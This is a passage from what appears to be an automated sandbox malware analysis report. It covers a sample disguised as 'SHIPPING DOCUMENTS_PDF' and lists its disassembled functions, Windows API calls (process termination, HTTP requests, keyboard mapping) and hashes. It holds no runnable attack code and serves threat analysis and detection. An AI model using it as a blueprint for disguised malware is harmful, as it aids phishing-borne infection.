                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    • Opcode ID: 69162850d5efe96e1cc321cc3e7b622cf659ff3e22550330525815040dfbb9cf
                                                                                    • Instruction ID: afeb44e84722435d4eb4d0c5ddeaef77f87916c628a9951d075e4f943cea4660
                                                                                    • Opcode Fuzzy Hash: 69162850d5efe96e1cc321cc3e7b622cf659ff3e22550330525815040dfbb9cf
                                                                                    • Instruction Fuzzy Hash: 84018475E05209BBEB109FA69C45E5EBFB8EB49311F0040B6FA08A7291EA709D00CF90
                                                                                    Function 00B70162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B70193
                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B7019B
                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B701A6
                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B701B1
                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B701B9
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B701C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual
                                                                                    • String ID:
                                                                                    • API String ID: 4278518827-0
                                                                                    • Opcode ID: c7bf2a588459a5419f1edeb0cc022c8c56ff51cff8b920a1c612fd41fe1c6a61
                                                                                    • Instruction ID: 1804d7f480039527574f53bbc24694e7e5885ed3ba8313c06904336b7b48e158
                                                                                    • Opcode Fuzzy Hash: c7bf2a588459a5419f1edeb0cc022c8c56ff51cff8b920a1c612fd41fe1c6a61
                                                                                    • Instruction Fuzzy Hash: 65016CB090275A7DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                                    Function 00BB53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00BB53F9
                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00BB540F
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00BB541E
                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BB542D
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BB5437
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BB543E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 839392675-0
                                                                                    • Opcode ID: 0c2b8cbc6ba7358daacf6b40115a410e89ed3f21cbb1d3400ba53ea7800920bc
                                                                                    • Instruction ID: c07c7708ed7d7451ef13a22d4ac9cad6f1b79ffe28fab458b4f8abfbf48e3292
                                                                                    • Opcode Fuzzy Hash: 0c2b8cbc6ba7358daacf6b40115a410e89ed3f21cbb1d3400ba53ea7800920bc
                                                                                    • Instruction Fuzzy Hash: 32F06231146159BBD7205B929C1DEFBBB7CEBC6B11F00016AF905D2050AAA05A01C6B5
                                                                                    Function 00BB7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00BB7243
                                                                                    • EnterCriticalSection.KERNEL32(?,?,00B60EE4,?,?), ref: 00BB7254
                                                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00B60EE4,?,?), ref: 00BB7261
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00B60EE4,?,?), ref: 00BB726E
                                                                                      • Part of subcall function 00BB6C35: CloseHandle.KERNEL32(00000000,?,00BB727B,?,00B60EE4,?,?), ref: 00BB6C3F
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB7281
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00B60EE4,?,?), ref: 00BB7288
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 3495660284-0
                                                                                    • Opcode ID: 699d3309991fdd05b713a39ce147e79ef8bfdcdd7f3a6eaca73c677aeb812cc7
                                                                                    • Instruction ID: 72c8298a8768d64e399a1792c620931461bc1d53ba075f0919ca95f33c475e43
                                                                                    • Opcode Fuzzy Hash: 699d3309991fdd05b713a39ce147e79ef8bfdcdd7f3a6eaca73c677aeb812cc7
                                                                                    • Instruction Fuzzy Hash: A1F05E3654A613EBDB112B64ED5CAFAB769EF45702B100572F543A20A0EFB65901CB50
                                                                                    Function 00BA8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BA899D
                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00BA89A9
                                                                                    • CloseHandle.KERNEL32(?), ref: 00BA89B2
                                                                                    • CloseHandle.KERNEL32(?), ref: 00BA89BA
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA89C3
                                                                                    • HeapFree.KERNEL32(00000000), ref: 00BA89CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                    • String ID:
                                                                                    • API String ID: 146765662-0
                                                                                    • Opcode ID: ea81ed0f726fd5edc4ed5ebeae8c593a516f9ff1556702d0e9ec81ccda5c30ad
                                                                                    • Instruction ID: 341d611e0a86edba22e0d17ebb44c939e63ba326027c6d80f442ddd1d802631c
                                                                                    • Opcode Fuzzy Hash: ea81ed0f726fd5edc4ed5ebeae8c593a516f9ff1556702d0e9ec81ccda5c30ad
                                                                                    • Instruction Fuzzy Hash: C7E0C936109002FBDA011FE5EC1C965FF69FB893227108232F21692170DF325420DB50
                                                                                    Function 00BC85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 00BC8613
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00BC8722
                                                                                    • VariantClear.OLEAUT32(?), ref: 00BC889A
                                                                                      • Part of subcall function 00BB7562: VariantInit.OLEAUT32(00000000), ref: 00BB75A2
                                                                                      • Part of subcall function 00BB7562: VariantCopy.OLEAUT32(00000000,?), ref: 00BB75AB
                                                                                      • Part of subcall function 00BB7562: VariantClear.OLEAUT32(00000000), ref: 00BB75B7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                    • API String ID: 4237274167-1221869570
                                                                                    • Opcode ID: 4f46bd8a8270d030aefcb576a82e5026f04158e4e60eda6220c33e4a391b2091
                                                                                    • Instruction ID: 403c6fb07d8c3c190f8e02b73c9679427244cf13de8c9ce76bcc0865db14b3d5
                                                                                    • Opcode Fuzzy Hash: 4f46bd8a8270d030aefcb576a82e5026f04158e4e60eda6220c33e4a391b2091
                                                                                    • Instruction Fuzzy Hash: D0914D75608301DFC710DF24C485E6AB7E4EF89754F1489AEF89A8B361DB31E909CB91
                                                                                    Function 00BB2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                                                                    • _memset.LIBCMT ref: 00BB2B87
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BB2BB6
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BB2C69
                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00BB2C97
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                    • String ID: 0
                                                                                    • API String ID: 4152858687-4108050209
                                                                                    • Opcode ID: 52daf8f8b89236b81e44137e6de87a37f1c7664bc00e62b0edabe0393cadbe35
                                                                                    • Instruction ID: 73612c81f6251382197dc05823bbbc8130b4e4e6190a9e75cd17ffd4c472859b
                                                                                    • Opcode Fuzzy Hash: 52daf8f8b89236b81e44137e6de87a37f1c7664bc00e62b0edabe0393cadbe35
                                                                                    • Instruction Fuzzy Hash: 9C51BF716083019BD7249F28D845ABFBBE8EF99310F044AAEF895D7290DBB0CD44D792
                                                                                    Function 00BAD56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BAD5D4
                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00BAD60A
                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00BAD61B
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BAD69D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                    • String ID: DllGetClassObject
                                                                                    • API String ID: 753597075-1075368562
                                                                                    • Opcode ID: 36641da74a6549b4a24d665fdbfdcbc80af15184a994c381ee03de441564c012
                                                                                    • Instruction ID: 97e2ff5268dd370ef54419e3cbd90e3cced3c6a465b3373172cacce1faca31b1
                                                                                    • Opcode Fuzzy Hash: 36641da74a6549b4a24d665fdbfdcbc80af15184a994c381ee03de441564c012
                                                                                    • Instruction Fuzzy Hash: FF416CB1604205EFDF05CF68C884AAABBF9EF45310B1581E9AD0A9F615D7B1DE44CBA0
                                                                                    Function 00BB2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BB27C0
                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00BB27DC
                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00BB2822
                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C15890,00000000), ref: 00BB286B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1173514356-4108050209
                                                                                    • Opcode ID: ae99d1a32519b63c7124d9b16e4d80b432748c204f762b2ca2ec75a34f79916b
                                                                                    • Instruction ID: 3e4d6623034b5098a32d66aa98a6b5cc475148b2caf3fbda75072e12f2b6dc7b
                                                                                    • Opcode Fuzzy Hash: ae99d1a32519b63c7124d9b16e4d80b432748c204f762b2ca2ec75a34f79916b
                                                                                    • Instruction Fuzzy Hash: 3841B1702043019FD720DF24DC85BAABBE4EF85314F044AADF866972D1DBB0E905CB52
                                                                                    Function 00BCD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BCD7C5
                                                                                      • Part of subcall function 00B5784B: _memmove.LIBCMT ref: 00B57899
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower_memmove
                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                    • API String ID: 3425801089-567219261
                                                                                    • Opcode ID: aa8ff359fbbee2a09a92546b48b0b3b60e1078d4d597adc000e1963a6d2f9b6c
                                                                                    • Instruction ID: 1209f61f1aeef86fa9b874192a678fc8fa7c7f5e7e75e55c3df83074adaf7339
                                                                                    • Opcode Fuzzy Hash: aa8ff359fbbee2a09a92546b48b0b3b60e1078d4d597adc000e1963a6d2f9b6c
                                                                                    • Instruction Fuzzy Hash: 37319075A04619AFCF00EF54CC51EAEB3F5FF14720B1086AAE825976D1DB31A905CB80
                                                                                    Function 00BA8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00BA8F14
                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00BA8F27
                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00BA8F57
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 365058703-1403004172
                                                                                    • Opcode ID: 5c58f8468d5036fb30853f5814b1d0e5ce60a8180b51feae30d5c778038016ef
                                                                                    • Instruction ID: af8f9b5f362586127d920dbf8581cebd56de332e8ec3281d8c46f5f3884b576c
                                                                                    • Opcode Fuzzy Hash: 5c58f8468d5036fb30853f5814b1d0e5ce60a8180b51feae30d5c778038016ef
                                                                                    • Instruction Fuzzy Hash: E921F571A08105BEDB14ABB0DC95DFEB7F9DF06320F0485AAF825571E0DF3A4809D620
                                                                                    Function 00BC182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BC184C
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC1872
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BC18A2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00BC18E9
                                                                                      • Part of subcall function 00BC2483: GetLastError.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC2498
                                                                                      • Part of subcall function 00BC2483: SetEvent.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC24AD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                    • String ID:
                                                                                    • API String ID: 3113390036-3916222277
                                                                                    • Opcode ID: c5393edbfca1024514f6a4ec7ce4e8fbd9663c87d8c4d1e35fdfe474647f2a8e
                                                                                    • Instruction ID: 241ad89fb8f05e0850a344ac31c1f99b09c7253521ad94824f7122e9ca64a3b1
                                                                                    • Opcode Fuzzy Hash: c5393edbfca1024514f6a4ec7ce4e8fbd9663c87d8c4d1e35fdfe474647f2a8e
                                                                                    • Instruction Fuzzy Hash: 3B21BEB1508209BFEB11AB68CC85FBB77EDEB49744F10456EF906A7241EB208D0597B0
                                                                                    Function 00BD63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B51D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B51D73
                                                                                      • Part of subcall function 00B51D35: GetStockObject.GDI32(00000011), ref: 00B51D87
                                                                                      • Part of subcall function 00B51D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B51D91
                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BD6461
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00BD6468
                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BD647D
                                                                                    • DestroyWindow.USER32(?), ref: 00BD6485
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                    • String ID: SysAnimate32
                                                                                    • API String ID: 4146253029-1011021900
                                                                                    • Opcode ID: 7bd4f44632b74005eacbb51e0bb6a7abfaa6108c53e439e3506be2fe1659e95a
                                                                                    • Instruction ID: 29c40d73d9da27f96f33938ba8f1a609f85ef3d209e316afab08b738295d2dc4
                                                                                    • Opcode Fuzzy Hash: 7bd4f44632b74005eacbb51e0bb6a7abfaa6108c53e439e3506be2fe1659e95a
                                                                                    • Instruction Fuzzy Hash: 7F215B71200205AFEF108F64DC91EBBB7E9EB59368F10866AFA5093390EB71DC519B60
                                                                                    Function 00BB6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00BB6DBC
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BB6DEF
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00BB6E01
                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00BB6E3B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: f4274e01a57529327977d6d8a07e6cba1bf1a0f6b8be5c7141892a3bc861ebab
                                                                                    • Instruction ID: f36396093677caeabfa429cf8a194711374b5b90543468cb8efc912f61174b1a
                                                                                    • Opcode Fuzzy Hash: f4274e01a57529327977d6d8a07e6cba1bf1a0f6b8be5c7141892a3bc861ebab
